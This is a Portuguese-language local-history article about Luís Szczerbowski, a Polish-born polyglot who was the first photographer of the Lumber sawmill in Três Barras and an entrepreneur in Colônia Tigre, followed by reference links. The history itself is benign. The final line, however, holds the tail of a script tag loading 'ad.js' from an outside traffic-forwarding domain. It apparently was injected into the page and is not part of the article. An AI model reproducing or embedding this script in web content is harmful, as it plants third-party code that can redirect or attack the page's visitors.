Curiosidades do Passado História Principais

Familiares do primeiro fotógrafo de Três Barras tem vestígios da serraria Lumber em propriedade na Colônia Tigre

Luís Szczerbowski, nascido na Polônia, em 17 de agosto de 1883, veio para o Brasil por volta de 1900. Foi editor do jornal Naród (O povo) em Curitiba. Poliglota, falava e escrevia nos idiomas polaco, russo, alemão, inglês e português. No município de Três Barras, trabalhou na serraria Lumber, como apontador e vendedor de terras, sendo o primeiro fotógrafo a registrar as atividades da empresa americana.

O Fotógrafo

A história da família Szczerbowski está atrelada a Colônia Tigre e a serraria Lumber.  Na propriedade da família é possível encontrar vestígios dos “tempos” da Lumber.

Colônia Tigre

Luis Szczerbowski, empreendedor, teve seus primeiros implementos agrícolas trazidos da Eslováquia. Formou um pomar com sementes importadas produzindo frutas e verduras de excelente qualidade. Instalou na Colônia Tigre um gerador elétrico e um moinho colonial movido com força hidráulica para moer trigo, centeio, milho, tafona de farinha de mandioca e polvilho, descascador de arroz, picador de palha. Teve ainda um apiário, além da fábrica de cigarros e na vila tresbarrense um ponto de comércio.

Com certeza, o nome de Luis Szczerbowski merece destaque na memória histórica tresbarrense.

 

Para saber mais:

Entrevista completa editada: https://www.ecosdocontestado.com/memorias

Artigo: LIMA, Soeli Regina. O acervo fotográfico de Luis Szczerbowski: fragmentos da memória. IN: Revista Memória em Rede. v. 8, p. 169-175, 2016. Disponível: https://docs.wixstatic.com/ugd/111853_bd505fbfe48d4db893a12e1b2a8daefa.pdf… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Comente esta matéria: